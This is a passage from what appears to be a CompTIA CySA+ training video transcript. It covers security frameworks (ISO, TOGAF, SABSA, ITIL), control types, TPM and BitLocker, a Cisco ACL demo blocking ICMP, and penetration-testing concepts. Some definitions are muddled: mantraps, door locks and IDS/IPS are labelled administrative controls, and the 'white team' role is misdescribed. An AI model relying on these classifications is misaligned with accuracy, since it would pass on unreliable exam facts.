systems, otherwise called IDPS. [Dan is referring to the ISO/IEC 27039:2015.] This deals with host analysis – analyzing suspicious activity on a host itself – or network analysis, where we're inspecting network traffic looking for suspicious activity. In the case of network analysis, we've got to be conscious about placement of the device or the solution on the network so that we can see the relevant traffic. It also deals with
IDS and IPS tweaking within a specific environment. All network environments are a little bit different from
one another. And as such, what's normal activity on one network might not be normal on another. So tweaking
is crucial. There are also IDS and IPS appliances that come in both hardware form as well as virtual machine
form that we can use in order to adhere to this ISO standard.
[The ISO/IEC 27039:2015(en) web page is open in the www.iso.org web site.] I've gone into my favorite
search engine and searched up ISO 27039. [The ISO/IEC 27039:2015(en) web page is divided into two
sections. The first section is the navigation pane. The second section is the content pane.] And here we can see
the details related to this specific standard. So, as we go through this document, which is available on the
Internet, we can see how it relates to intrusion detection and prevention systems and the guidelines or
recommendations that are part of this ISO standard. Now bear in mind, some organizations or government
agencies might require ISO accreditation. [He resumes the explanation of the ISO.] ISO/IEC 30121 deals with
the governance of digital forensic risk frameworks. This is more related then to the gathering of evidence and
ensuring that evidence is kept safe and not tampered with. So the guidelines are for preparing for digital
investigations. It deals with evidence availability and adherence to the chain of custody.
Upon completion of this video, you will be able to recognize how the TOGAF enterprise IT architecture can
increase the efficiency of security controls.
Objectives
recognize how the TOGAF enterprise IT architecture can increase efficiency of security controls
[Topic title: TOGAF. The presenter is Dan Lachance.] There are many different frameworks that can be
adhered to when securing an IT infrastructure. In this video, we'll talk about TOGAF.
TOGAF stands for The Open Group Architecture Framework. This is an enterprise architecture framework that
deals with improving resource efficiency. Now, as a result of that or as a by-product of that, we are improving
upon the return on investment in IT solutions. It also deals with process improvement. This is ongoing. So
periodic monitoring will ensure that business processes are efficient and effective as it relates to the IT systems
that support those processes. So, in the end, TOGAF really deals with improved business productivity.
On the IT efficiencies side, part of that involves application portability so that applications can be run on a
variety of platforms or in a variety of environments. So for example, part of TOGAF IT efficiencies addresses the vendor lock-in problem. Now, in the case of public cloud providers, the last thing that we want is to be locked into a specific cloud provider solution because we're using a proprietary solution that wouldn't work with a different provider without a major investment. So this is something that has to be considered in the
case of an enterprise looking, in this particular example, at public cloud solutions. Other IT efficiencies related
to TOGAF include the rapid and cost-efficient procurement of IT solutions. And we have to be careful with this one because we don't want to sacrifice security at any phase of development of the solution, but it does relate to things like cloud rapid elasticity. This is one of the pillars of cloud computing – the ability to rapidly
provision IT resources as required and also the rapid ability to deprovision those resources when no longer
needed.
TOGAF also deals with stakeholder concerns where it addresses conflicting concerns. For instance, dealing
with the cost of an effective security control might not be something that an organization is ready to jump on
immediately if not absolutely required. Yet, at the same time – if we're talking about protecting customer
information – well, the customer would be a different type of stakeholder where, of course, it is in their interest
to protect their data. So we could have conflicting concerns that have to be carefully weighed and addressed so that all parties are kept happy and that we adhere to the required laws or regulations. Also, there needs to be
consistency with how stakeholder concerns are dealt with. Organizational policies will deal with this as well as
business processes.
In the end, it's important that all of our IT solutions support business processes so that we make sure our
solutions have some kind of return on investment over time because they align with business needs. Data
governance is also a part of TOGAF where we have data custodians that are required to take care of data.
Things like dealing with access to data, the backup of data, making sure data is highly available, making sure
that we adhere to laws and regulations as related to certain types of data such as personally identifiable
information or PII that must be kept under strict lock and key and that will vary in different parts of the world
in terms of exactly how that is done.
Data governance also deals with data migration. Now data migration could be reflected when we're looking at
moving to a public cloud solution where data exists currently on-premises. There is also the whole issue of big
data management and data analytics related to big data. With today's large volumes of data, we need effective
solutions to be able to process that data effectively. And usually, how that works out is by using some kind of
large scale distributed processing solution such as a Hadoop cluster.
recognize how to assess risk and apply effective security controls to mitigate that risk
SABSA is another framework. And it stands for Sherwood Applied Business Security Architecture. This
framework deals with security as related to business processes. So it's really an enterprise security architecture
that deals with enterprise service management. And its core driving factor is analyzing risk to assets that have
value to the organization. So SABSA then results in security solutions that support business objectives
directly.
SABSA consists of integrated frameworks. It's really the best of multiple worlds. Some of those integrated
frameworks include TOGAF, The Open Group Architecture Framework, as well as ITIL – the IT Infrastructure
Library – where those frameworks deal with making sure that we have very efficient business processes that
support business requirements and that are also secured with effective security controls. Now SABSA also has
a number of methods for implementation and these are standards based on NIST and ISO publications that are
related to things like business continuity and security service management. There are also legal and regulatory
compliance factors that have to be considered with SABSA and that will vary from one organization to the
next in different parts of the world in different industries.
The SABSA lifecycle begins with the planning phase where business requirements and related risk are
assessed. In the SABSA design phase, we can either look at existing security tools that we deem to be effective
in protecting assets or processes or we could develop custom solutions. The idea is that security has to be a part
of all phases. Of course then, once we have designed our solution, we can make sure it gets implemented
properly and then managed and monitored over time. Now monitoring, of course, is an ongoing task to ensure
that business objectives are still met in a secure and efficient manner.
SABSA roles and responsibilities include those such as data custodians. Data custodians may not necessarily
make the rules about how data should be treated, but they must enforce them and make sure that data is
available – for instance, that it is being backed up, or that there is a clustering solution for data high availability, or
that data is wiped or sanitized in an acceptable manner and so on. Then there are roles such as service
providers and consumers, which are bound in their activities by the service-level agreement or the SLA. In the
case of a public Cloud provider, for instance, the SLA will guarantee a certain amount of uptime usually
expressed as a percentage on a monthly basis.
Then of course, there is the inventory of assets that have value to the organization. This can be manual or
automated. And then there are network and host layout diagrams for configuration and security controls.
SABSA also deals with things like personnel management at the human resources or HR level. Things like
background checks, responsibilities for employees, and access control lists, whereby the principle of least privilege is followed to ensure that people only have the privileges they need to perform a specific job function.
After completing this video, you will be able to recognize how to apply ITIL to increase the efficiency of IT
service delivery.
Objectives
[Topic title: ITIL. The presenter is Dan Lachance.] In this video, I'll discuss ITIL.
ITIL stands for Information Technology Infrastructure Library. And one of the ideas behind ITIL is to
efficiently deliver IT services that meet business needs. IT service management makes sure – besides aligning
to business needs – that business processes are supported with our IT solutions, that we can quickly adapt to
change and growth, and that we have got the efficient and effective delivery of IT services as required.
Starting with the Service Strategy and Service Design parts of ITIL continuous improvement: with design, we must identify the services that need to be provided, define how they'll be provided, and identify the need for them.
Now that also includes planning items such as the cost related to these required services and the way to
efficiently provide these services at a minimized cost. With the Service Transition portion, we're dealing with
things such as patch management for an IT solution as well as new versions of software that must be managed
over time. With Service Operation, we're really talking about configuring our IT solutions to meet business or
customer needs. And also, this is really the continuous life cycle of service improvement over time.
ITIL does not prescribe specific IT operational "how tos." It also is not a collection of best practices, but it does
provide various solutions to make IT system secure and efficient. It can also provide a service migration road
map from on-premises solutions to cloud provider solutions.
ITIL includes some recommendations on how to engage appropriate stakeholders, whether they be CIOs – Chief Information Officers – customers, end users within the organization, and so on. But ITIL is designed to
focus on customers and their needs. Of course, ITIL also allows us to mold this framework to our
organization's specific business processes so that we can standardize processes. And, by doing that, we enable
a quicker response to change when change is required. Now ITIL is continual service improvement over the
long term. So like a great investment, you have to be patient. It's designed to show improvement over time, but
it is ongoing and it requires diligent continuous monitoring.
[Topic title: Physical Controls. The presenter is Dan Lachance.] In this video, we'll talk about physical
controls.
Physical controls are right up there alongside user awareness and training as being simple common-sense
security solutions that are often overlooked. We need to think about risk countermeasures as related to physical
controls so that we can protect sensitive data, IT systems, of course physical property, as well as intellectual
property.
Threat scenarios as related to physical security controls include malicious users booting from alternative
media. What we could do to counter that is to set a BIOS password. Then there is the threat of the
retrieval of sensitive data from USB thumb drives or mobile devices – both of which are easy to lose or to have
stolen. So one way to counteract that threat is to encrypt data at rest on these types of devices and also in the
case of mobile devices to enable remote wipe. There is also the threat of network traffic being captured and
analyzed. Well, other than the obvious of encrypting network transmissions physically, we might want to
control access to the network. We might do that using network access control or NAC with centralized
RADIUS authentication. But, at the physical level – if you think about, let's say, a reception area in an office –
any network wall jacks should probably be disabled. We don't want someone coming in with a laptop and
plugging into a wall jack behind a plant and gaining access to the network. The same, of course, applies to
wireless networks.
Then there are physical controls related to physical buildings and facilities or even floors within buildings.
Things like fencing to keep people out, proper lighting, security guards, security cameras, the use of ID badges
for personnel identification – especially after hours and even during work hours – mantraps, which require that
an outer door be closed before a second inner door allows access to a facility. So there are various security
systems, such as alarm and sensor systems, that can be used to physically protect buildings, facilities, and even
floors within buildings.
We should also consider the fact that in the event of a catastrophe, our data needs to be available elsewhere. So
we might have data replication to alternative locations or we might have backup tapes stored offsite. We
should be using door locks to protect sensitive areas of a facility. Certainly, that would include server rooms
and even within a larger data center, the front and back of server room racks should be locked. In the case of
end-user laptops, we could also use lock-down cables so that when a user is working within a certain location,
such as at a customer site, she could use the lock-down cable to secure the laptop around the leg of a piece of heavy furniture to prevent its theft. There can also be controlled access to floors and rooms. We have probably
all encountered this going into work after hours with a passcard that allows us access to only certain floors in a
building or only certain rooms within a facility. In the case of power outages, there should also be backup
generators so that we can still use our electronic security systems.
To identify logical security controls, consult a security specialist or look for information online.
Objectives
[Topic title: Logical Controls. The presenter is Dan Lachance.] In this video, I'll talk about logical controls.
So we know that physical controls include things like locked doors to server rooms, fencing around a building,
and so on. But what exactly are logical controls? Well, these are often called technical controls. They are
designed to enforce access control to resources such as access to a network or to an IT system or to specific
data within a system. Either way, logical controls must align with organizational security policy and there
needs to be continuous monitoring and evaluation of the effectiveness of these controls in protecting data. And
you will notice that this is a common theme with IT security – continuously monitoring and verifying that our
security solutions properly protect assets.
Authentication is a logical control. And it is the proving of one's identity. There are three categories of authentication: something you know like a password, something you have like a smart
card, and something you are such as a unique fingerprint. Multifactor authentication or MFA combines at least
two of these categories. Maybe it would include a smart card and a PIN – something you have and something
you know. Identity Federation is also a part of authentication that is becoming more and more popular these
days. Essentially, with Identity Federation, we have got a trusted central identity store. So, instead of having
multiple copies of user credentials, for example, we have got one central copy that is trusted by multiple
applications. So therefore, there has got to be some configuration, of course, so that various applications trust
the central identity store and also the central identity store has to trust the relying applications. Now the idea is
that Identity Federation is a single set of credentials that allows Web Single Sign-On for web applications.
Authorization occurs after successful authentication. We should be following the principle of least privilege so
that we only assign permissions that are absolutely required and nothing more. This is often done through
access control lists or ACLs at various levels. So we could have an ACL controlling access to various portions
of a web site or within an application. ACLs can control degrees of access to the file system on a server or
access to a network itself through network ACLs, which are often called network packet filtering rules.
Other examples of logical controls include antimalware, hardware tokens used for VPN authentication where
the hardware token is going to have a numeric code that changes periodically and is synchronized with the
VPN appliance. So we have to enter in that unique numeric code within a certain timeframe to successfully
authenticate to the VPN. Password policies are another example of logical controls, as are NTFS file system permissions.
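The time-synchronized numeric code on such a hardware token typically follows the TOTP algorithm from RFC 6238. Here is a minimal Python sketch of generating that kind of code from a shared seed; the seed value is made up for illustration.

    import hmac
    import hashlib
    import struct
    import time

    def totp(secret: bytes, interval: int = 30, digits: int = 6) -> str:
        # Counter = number of 30-second intervals since the Unix epoch (RFC 6238).
        counter = int(time.time()) // interval
        msg = struct.pack(">Q", counter)
        digest = hmac.new(secret, msg, hashlib.sha1).digest()
        # Dynamic truncation (RFC 4226) picks 4 bytes based on the last nibble.
        offset = digest[-1] & 0x0F
        code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % (10 ** digits)).zfill(digits)

    shared_token_seed = b"hypothetical-seed-shared-with-the-VPN-appliance"
    print(totp(shared_token_seed))   # both the token and the VPN appliance compute the same 6-digit code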
In this video, you will learn how to configure router ACL rules to block ICMP traffic.
Objectives
[Topic title: Configure Router ACL Rules. The presenter is Dan Lachance. The Cisco Packet Tracer Student
window is open. Running along the top of the screen is the menu bar. The menu bar includes the File, Options,
and Help menus. The rest of the screen is divided into two sections. The first section includes The Logical,
New Cluster, and Viewport tabs. By default, the Logical tabbed page is open. The Logical tabbed page
includes a diagram. In the diagram, the PC-PT Client is connected to the 1841 Router1 via the 2950-24
Switch0. The 2950-24 Switch0 is further connected to the Server-PT Local DNS Server. The 1841 Router1 is
connected to the 2950-24 Switch1 via 1841 Internet and 1841 Example routers. The 1841 Internet is further
connected to the Server-PT Root DNS Server. The 2950-24 Switch1 is connected to the Server-PT
server.example.com and Server-PT authority.explains.com.] In this video, I'll demonstrate how to configure a
router ACL rule.
ACL stands for access control list. And, on a router, it essentially either permits or denies traffic into or out of
a specific router interface. So essentially, it's traffic filtering kind of like a packet filtering firewall. In our
diagram, we can see on the left that we have got a client PC that needs to go through a router here called
Router 1 in order to access our HTTP web server over here on the right, which has a DNS name of
server.example.com. So, in our diagram, the first thing we'll do is click on our client PC. [Dan clicks the PC-
PT client and the Client window opens. The Client window includes the Physical, Config, and Desktop tabs.
By default, the Physical tabbed page is open. The Physical tabbed page is divided into two sections. The first
section includes the MODULES and PT-CAMERA options. The second section includes the Zoom In, Original
Size, and Zoom Out tabs.]
Now this is a simulator. So, in the simulator here, I'm going to go to the Desktop tab and click on Command
Prompt. [The Desktop tab includes the Terminal, Command Prompt, Web Browser, and VPN icons. He clicks
the Command Prompt icon and the command prompt opens.] The first thing we're going to do is make sure
that we have got any type of connectivity at all. So I'm going to try to ping our web server by name. I'm going
to type ping server.example.com. So we can see that DNS resolved server.example.com to the IP address of
10.4.0.3. And of course, we have got a number of replies. So we know that ICMP network traffic is working
through Router 1 because we are getting these replies back. What we're going to do in our example is
configure an ACL rule on Router 1 that doesn't allow ICMP traffic, but we still want to be able to connect to
our web server. [He closes the Client window and the Cisco Packet Tracer Student window reappears.]
So, to begin this, if I were to take a look by simply hovering over Router 1 in my diagram, it will pop up and
give me a little bit of details about some of the network interfaces, which I can also click on the router to see as
well. [He clicks the 1841 Router1 and the Router1 window opens. The Router1 window contains the Physical,
Config, and CLI tabs. By default, the Config tabbed page is open. The Config tabbed page includes three
sections. The first section is the navigation pane. The navigation pane includes the GLOBAL, Settings, and
FastEthernet0/0 options. The second section is the content pane. He clicks the FastEthernet0/0 option and its
content is displayed in the content pane. The content pane includes the MAC Address, the Subnet Mask, and Tx
Ring Limit text boxes. The third section includes the Equivalent IOS Commands text box.] For example,
FastEthernet0/0 – we can see that interface here. This is the one that we're going to be using to control traffic
coming in from the PC on the left. Basically, we want to block ICMP traffic. [He closes the Router1 window
and the Cisco Packet Tracer Student window reappears.] So what we're going to do is click right on the router
in the simulator and click the CLI tab. [He clicks the 1841 Router1 and the Router1 window opens.] CLI
stands for command line interface. [The CLI tabbed page includes the IOS Command Line Interface, the Copy
button, and the Paste button.] So now what we're going to do is make sure that we configure an access list to
basically deny ICMP and allow all other IP traffic. To do that, I will type access-list 101 – that's the access list number – denying ICMP from anywhere to anywhere. [He types the following command in the IOS Command Line Interface: access-list 101 deny icmp any any.] So I want to block all ICMP. At the same time, I'm going to use
the access list command again – access list 101. But this time I'm going to permit IP traffic – so from anywhere
to anywhere. [He types the following command in the IOS Command Line Interface: access-list 101 permit ip
any any.] So of course, ICMP and IP are matched as different protocol keywords in the ACL syntax.
Next thing I want to do is go into the configuration of the appropriate network interface I want to apply those
rules to. So I'll type interface, now Fast Ethernet or FA0/0 is what I want to connect to. [He types the following
command in the IOS Command Line Interface: interface fa0/0.] So my prompt now shows the interface configuration mode, indicating that I'm now configuring that specific interface. Okay, that's great because now I want to use the ip access-group command, specify the number of my access list – 101 – and tell it that I want to bind it to this network interface for inbound traffic, so in. [He types the following command in the IOS Command Line Interface: ip access-group 101 in.] Now, at this point, it should be ready to go. And what that
means is that ICMP traffic should not be allowed, but all other IP traffic should be. Now, in the production
environment, first of all, you would probably be sitting at a station using PuTTY or some other remote tool to
SSH into your router. Secondly, don't turn off ICMP as we have done in this example unless you're absolutely
sure it isn't required by something in your network environment.
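In a production environment, you would typically push this kind of change from your workstation over SSH rather than typing it at a console. Here is a minimal sketch using the third-party netmiko Python library to apply the same ACL; the router address and credentials are placeholders, and the commands mirror what was typed in the simulator.

    from netmiko import ConnectHandler  # third-party: pip install netmiko

    router = {
        "device_type": "cisco_ios",
        "host": "192.0.2.1",            # placeholder management address for Router 1
        "username": "admin",
        "password": "changeme",
    }

    acl_commands = [
        "access-list 101 deny icmp any any",
        "access-list 101 permit ip any any",
        "interface fa0/0",
        "ip access-group 101 in",
    ]

    with ConnectHandler(**router) as conn:
        output = conn.send_config_set(acl_commands)   # enters configuration mode and applies each line
        print(output)

Note that the deny icmp line must come before the permit ip line, since the ACL is evaluated top to bottom.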
So let's go ahead and test this. I'm going to click the client PC in our simulator over on the left. [He clicks the
PC-PT Client and the Client window opens.] And I'm going to run a Command Prompt. So first thing I'll do is
try to ping server.example.com once again. However, notice this time that we get a destination host unreachable where previously we were getting replies. The only thing that's changed here is that our router ACL doesn't allow ICMP. So that appears to be working. However, do we have any other type of connectivity
through Router 1? [He closes the command prompt.] So, to test that, I'm going to start a web browser on our
PC in our simulator. [He clicks the Web Browser icon and the Web Browser window opens. The Web Browser
window includes the URL text box, the Go button, and the Stop button along the top.] And we're going to see if
we can connect to server.example.com over HTTP because it is our web server. [In the URL, he types
http://server.example.com. Then he clicks the Go button.] And sure enough, this sample page popped up, where we can see the blue text with the name of the server. [Below the URL text box, the name of the server is
displayed, which is server.example.com, which is also known as www.example.com.] So we know that we
have still got HTTP traffic, but we don't have ICMP connectivity through Router 1.
In this video, you will learn how to identify administrative security controls.
Objectives
[Topic title: Administrative Controls. The presenter is Dan Lachance.] In this video, we'll discuss
administrative controls.
Administrative security controls are defined by organizational policies and procedures, which could be
influenced by laws and regulations or business contracts. They include things like how to deal with personnel
in a secure manner – which would include things like secure background checks and so on – as well as the
adherence to business practices, ongoing monitoring and improvement.
Administrative controls have a number of categories such as preventative controls. These types of controls
minimize damage by preventing negative incidents or attempting to prevent them in the first place. It would
include things like mantraps controlling access to a physical facility, where the outer door must close before an inner door opens. This will prevent people from tailgating or piggybacking – coming in behind you without you knowing. Door locks are considered preventative administrative controls, as is the separation of duties. Now separation of duties ensures that we don't have one person that can control an entire business process from beginning to end; we have multiple people involved. Unless those people collude together to commit fraud, for example, separation of duties can prevent it. Hiring and background checks are definitely
preventive administrative controls related to personnel as is disaster recovery planning and business continuity
planning to ensure that we can get systems and business processes back up and running as quickly and
efficiently as possible in the event of a negative incident.
Detective administrative controls are used to discover negative events that have occurred after they have
occurred. Things like intrusion detection systems or IDSs – which can detect anomalies and report on them,
but don't stop them – that's where intrusion prevention systems would come in. Rotation of duties within an
organization is considered a detective administrative control because when a new employee fills a position,
they might notice a discrepancy or an anomaly from the previous person that held that role. Same thing is true
with mandatory vacations. Security audits are sometimes required in order for organizations to comply with
what is required for certain types of businesses, but at the same time, security audits can also be used to
identify suspicious activity after it's already occurred. And we can learn from that to harden our environment.
Corrective administrative controls allow us to get things up and running – so for example, restoring a business
process to its original functional state, maybe, after a server that supports that process crashes. Data backups
are corrective administrative controls that we can use to restore data in the event of a problem. Intrusion
prevention systems can also not only detect and report on anomalies, but take steps to prevent them from
continuing. So therefore, they are considered corrective and not just detective administrative controls. The
execution of a disaster recovery plan is also considered a corrective administrative control-related action.
Learn how to identify security controls that compensate for other controls that are not fully effective.
Objectives
[Topic title: Compensating Controls. The presenter is Dan Lachance.] In this video, I'll talk about
compensating controls.
There are many different categories of controls that can be used to secure business processes or assets. Compensating controls are used when more complex or expensive solutions just aren't practical. We might also have an inability to comply with specific security requirements due to business or technical constraints, such as limits within our budgets or limits to our internal skill set. Compensating controls
need to address the original intent of the security requirement. And the great news is that we can even use
multiple compensating controls in place of one more complex or expensive solution.
Continuous monitoring ensures that our compensating controls are still effective in protecting business
processes or assets. In some cases, due to legal or regulatory compliance, we might have to use specific
compensating controls. Now, because we have an ever-changing business and technical environment, we're required to continuously monitor all of our security controls. We can do that using a variety of solutions, including a Security Information and Event Management system or SIEM.
Some examples of compensating controls include a requirement where we have to prevent unwanted network
access. So our compensating control might be to disable unused switch ports. Another requirement might be
segregation of duties as related to a specific business process. Our compensating control might be to use video
surveillance within the facility. Another requirement might be to use multifactor authentication for each
application. However, a compensating control instead might be to use network access control to control
network access in the first place with multifactor authentication. When you look at specific requirements such
as with PCI DSS for organizations that deal with cardholder information for credit and debit cards, they'll list
some compensating controls that might be used in place of other more complex or expensive solutions.
[Topic title: Continuous Monitoring of Controls. The presenter is Dan Lachance.] The implementation of a
security solution does not mark the end of our responsibility as IT security technicians. In this video, we're
going to talk about continuous monitoring of controls.
Information Security Continuous Monitoring or ISCM is just that: continuously monitoring the effectiveness of security controls. It also allows for a timely response to threats that are ever-changing. Threat prioritization is also possible for the proper allocation of project teams and resources. So, in the end, we're evaluating the effectiveness of security controls by constantly monitoring how they perform and how they are used. We might be required to do this for compliance with certain laws and regulations, which in turn
might actually influence the crafting of our organizational security policies. In some cases, it might also dictate
the use of compensating security controls in place of more expensive or more complex solutions.
With continuous monitoring, collected data gets periodically analyzed, which allows for risk management.
Risk management allows us to look at the acceptance of risk by engaging in certain business activities or risk
mitigation by using certain types of security controls, in some cases, even risk transfer – for instance – to a
public cloud provider or to an insurance company. Real-time monitoring is possible with systems including
Security Information and Event Management systems, otherwise called SIEM.
Information sources for continuous monitoring come from a multitude of places including log files, which
could be for network devices, servers, client devices, applications, and so on. We can also take a look at
vulnerability scan results as an information source for continuous monitoring of our controls because this will
point out any vulnerabilities that we need to address. So it'll also lend itself to threat prioritization. Audit
findings are a gold mine of information. For instance, if we're being audited by a third party that doesn't know anything about our system and has no specific interest other than conducting an audit, then
we can use that to learn about weaknesses and then make changes to security controls.
People are another information source – people that notice suspicious activity, whether it's physical or on
the network. And of course, we can take a look at existing business processes to determine if we need to make
changes to further harden our environment.
[Topic title: Hardware Trust. The presenter is Dan Lachance.] In this video, we'll talk about hardware trust.
Firmware is essentially software embedded in a chip. And it's usually for a very specific use unlike an
operating system, which can do millions of things. So therefore, there is often much more trust placed in
hardware or firmware security solutions. One example of this is the Trusted Platform Module or TPM. This is
a firmware standard built in to modern laptops, desktops, and servers. It's part of a chip on the motherboard.
Now TPM can also be built in to the firmware of other devices like set-top boxes, smartphones, and even tablets. It's part of NIST's trusted computing guidance in Special Publications 800-147, 800-155, and 800-164, which you could look up in your favorite search engine.
TPM or Trusted Platform Module is firmware that can store cryptographic keys. Now this is used, for instance,
by software – such as Microsoft BitLocker – to store keys that are used for encryption and decryption of
entire disk volumes. However, specific solutions like Microsoft BitLocker can also allow keys to be stored on
USB thumb drives for non-TPM systems. TPM, when it gets initialized at the firmware level, creates what's
called a storage root key or SRK. Application-based keys are then protected by the storage root key. TPM
deals not only with the encryption and decryption of entire disk volumes, but it can also detect changes to the boot environment.
So therefore, it's considered an effective mitigation against bootkit threats or master boot record or MBR
rootkits or even the 2011 Mebromi attack. Mebromi is another form of a bootkit attack. Essentially, it can
make changes to BIOS configurations and, in fact, the master boot record. Or you know, there are also some
bootkit threats that can actually flash or wipe the BIOS on a system making it unusable. Now with TPM, when
it gets configured and when it detects a boot-up change, the system will reboot and you will need to enter a
recovery key password to continue because it's considered suspicious activity.
Microsoft BitLocker is disk volume encryption. It doesn't encrypt specific files or folders like Microsoft EFS,
which stands for Encrypting File System. It's not tied to the user and it's designed really to protect data at rest.
So, when a system boots up and a BitLocker encrypted volume is decrypted, it's business as usual and there is no special protection. So it's designed for not only fixed disks, but also removable media, where Microsoft BitLocker To Go can be configured to encrypt data, for instance, on a USB thumb drive. It can also be
configured to require a PIN at startup.
[The BitLocker Drive Encryption window opens. It includes the C: BitLocker off drive, the Data (D): BitLocker
off drive, the NEW VOLUME (E:) BitLocker off drive, and the USB (G:) BitLocker off drive.] Here, in the
Windows environment, I have started the BitLocker tool where I can see all of my disks such as C: where it
states that BitLocker is off. [The C: BitLocker off drive includes the Turn on BitLocker link.] Although, I do
have the option of turning on BitLocker for C: as well as my other fixed data drives. Because I have got a USB
thumb drive inserted, I have also got G: – in my case – listed down here where it says BitLocker is off where I
can configure BitLocker To Go. [Dan maximizes the USB (G:) BitLocker off drive. It includes the Turn on
BitLocker link.] And, if I were to click on that drive and then click on the Turn on BitLocker link, it goes
through a wizard that allows me to secure or encrypt the data on that USB thumb drive.
[The BitLocker Drive Encryption (G:) wizard includes the Use a password to unlock the drive checkbox, the
Use my smart card to unlock the drive checkbox, and the Next button.] For BitLocker To Go, I can flag
whether I want to Use a password to unlock the device either on this machine or others and/or the ability to use
a smart card to unlock the drive. [He selects the Use a password to unlock the drive checkbox and the Use my
smart card to unlock the drive checkbox. Then the Group Policy Management Editor window opens. Running
along the top is the menu bar. The menu bar includes the File, Action, and Help menus. The rest of the screen
is divided into two sections. The first section is the navigation pane. It includes the Default Domain Policy
[DC001.QUICK24*7.COM] Policy root node. The Default Domain Policy [DC001.QUICK24*7.COM]
Policy root node contains the Computer Configuration and User Configuration subnodes. By default, the
Domain Policy [DC001.QUICK24*7.COM] Policy root node is selected. The second section is the content
pane, and it contains the Extended and Standard tabs at the bottom. By default, the Extended tabbed page is
open. The Extended tabbed page includes the Computer Configuration and User Configuration subnodes.] To
configure the behavior of BitLocker on a larger scale, I might use Group Policy, which I have got open here.
So what I would do then – in the left-hand navigator under Computer Configuration – is open up Policies -
Administrative Templates - Windows Components. [He expands the Policies folder present under the
Computer Configuration subnode. The Policies folder includes the Software Settings and the Administrative
Templates: Policy definition subfolders. He further expands the Administrative Templates: Policy definition
subfolder. The Administrative Templates: Policy definition subfolder includes the Control Panel subfolder, the
Windows Components subfolder, and the System subfolders. He expands the Windows Components subfolder.
The Windows Components subfolder includes the Biometrics, the BitLocker Drive Encryption, and the Edge
UI subfolders. He selects the BitLocker Drive Encryption subfolder. ] Then I would choose BitLocker Drive
Encryption. [The BitLocker Drive Encryption subfolder includes the Fixed Data Drives and the Removable
Data Drives subfolders.] So here I have got options for Fixed Data Drives versus Removable Data Drives as
well as just some general BitLocker Drive Encryption options. [He selects the Bitlocker Drive Encryption
subfolder. The Content pane includes the Fixed Data Drives folder and the Prevent memory overwrite on
restart option. He then selects the Prevent memory overwrite on restart option. Then its information is
displayed in the content pane.]
In this video, learn how to identify factors related to conducting penetration tests.
Objectives
identify factors related to conducting penetration tests
[Topic title: Penetration Testing. The presenter is Dan Lachance.] In this video, we'll talk about penetration
testing.
Penetration testing is often simply referred to as a pen test. However, it's not the same as a vulnerability scan. With a vulnerability scan, we scan a host or a network to identify weaknesses, but none of those weaknesses
get exploited. Well, with the pen test, we are exploiting the weaknesses to see what the reaction is from those
systems. So really, a pen test is testing to discover weaknesses and then exploiting those weaknesses. It can be
applied to a network. A pen test could be for a specific host or even just a specific application as part of the
application life cycle.
There needs to be rules of engagement prior to engaging in penetration testing because we have to think about
the impact or effect on production systems if the pen test is done on live production systems. We don't want a
pen tester bring down a mission critical component that is required for business without thinking about it first
and getting the proper permission. So we might consider then having a separate testing environment, which
may or may not be virtualized. We also have to think about the duration of the penetration test. Will it be
hours? Will it be days? Will it be weeks?
The key here is to think of these things ahead of time, prior to the pen test. There might also need to be signed nondisclosure agreements because a penetration test could potentially uncover very sensitive information that the data owners thought was protected. There also
needs to be a testing schedule that is set ahead of time. Now, in some rare cases, a pen test schedule might not
be known by the network or data owners. And that's part of the point of the pen test as you never really know
when malicious users will strike. However, we might have a testing schedule that is known by all parties that
might take place after hours.
With penetration testing, we can have various teams. A red team, for instance, will be the team that would
attack an IT system, whereas a blue team would defend IT systems. The white team will be used to identify weaknesses and then report them rather than exploiting them. Now this might be a hybrid of internal IT personnel and an external pen test team. Or it could be done completely externally. Or you might only use
a portion of these types of teams. The idea is that a pen test is a live attack-and-defense exercise where we
would involve multiple teams, should we choose to use them. We can also use tabletop or whiteboard exercises
to step through an attack and the mitigations used to stop it.
White-box testing is a pen test that gets run with full knowledge of the IT system being tested. Now
grey-box testing is a pen test that's being conducted with only partial knowledge of an IT system. Now that
could mirror, for example, a malicious user that's done some reconnaissance and learned a little bit and
inferred a little bit about how an IT system is configured. Black-box testing is a pen test where there is no
knowledge at all of an IT system. Now, for a hardened environment, reconnaissance might not reveal much of
anything useful to an attacker. So we can look at the various types of tests that we can be conducting against
our networks, hosts, or apps from various perspectives. There is also the aspect of social engineering, which
can also be a part of the pen test. It doesn't all have to be technical tools. Social engineering is tricking people
into somehow providing sensitive information they otherwise wouldn't provide. That might be in
the form of, during a pen test, part of the team calling up end users pretending to be a part of the helpdesk to
retrieve sensitive information.
Exercise Overview
[Topic title: Exercise: Mitigations and Security Control types. The presenter is Dan Lachance.] In this exercise, you'll begin by identifying characteristics of host hardening, followed by describing the purpose of a honeypot and identifying standards bodies that provide IT security guidance. You will then contrast physical, logical, and administrative controls, and finally you will discuss the purpose of penetration testing. At this time, pause the video, perform each of these exercises, and then come back to view the answers.
Solution
Host hardening includes many aspects such as firmware patches being applied either to expansion cards or to
the BIOS on the motherboard. Software patches, changing default configurations, the use of complex
passwords, and removing unneeded services also fall under host hardening.
A honeypot is a system that's intentionally left vulnerable. The purpose is so that we can track malicious
activity. However, care must be taken when using honeypots so that the honeypot doesn't get compromised by
malicious users and is then used to attack others. There is also the unintentional data leakage that we have to
consider.
Standards bodies that provide IT security guidance include the National Institute of Standards and Technology
or NIST, the International Organization for Standardization or ISO, and also the Open Web Application
Security Project or OWASP, which focuses specifically on web application security.
Physical security control types include things such as video surveillance and mantraps, whereas logical
security control types include examples such as network ACLs and multifactor authentication. Administrative
security control types include things such as background checks for employees as well as mandatory vacations
to point out anomalies.
Penetration testing is a type of test that's used not only to discover weaknesses, but also to exploit them. We can apply penetration testing to an entire network, to a specific host, or even down to a
specific application.
CompTIA Cybersecurity Analyst+: Protecting Network Resources
Authentication controls who gets access to resources. Stronger authentication means greater control over
resource access. Discover network protection techniques, including cryptography, biometrics, hashing, and
authentication.
Table of Contents
Objectives
[Topic title: Cryptography Primer. The presenter is Dan Lachance.] In this video, I'll talk about cryptography.
Cryptography protects digital data. It provides confidentiality, integrity, and authentication. Cryptanalysis, on
the other hand, is the close scrutiny of a cryptosystem to identify weaknesses within it. Encryption and
decryption of data is essentially data scrambling to prevent access to data by unauthorized users.
Authentication is used to verify the authenticity of the origin of data. In other words, in the case of e-mail perhaps, we have a digitally signed message that we can verify really did come from who it says it came from. So the sender cannot refute the fact that it was sent. And this is called nonrepudiation. Now this is because the
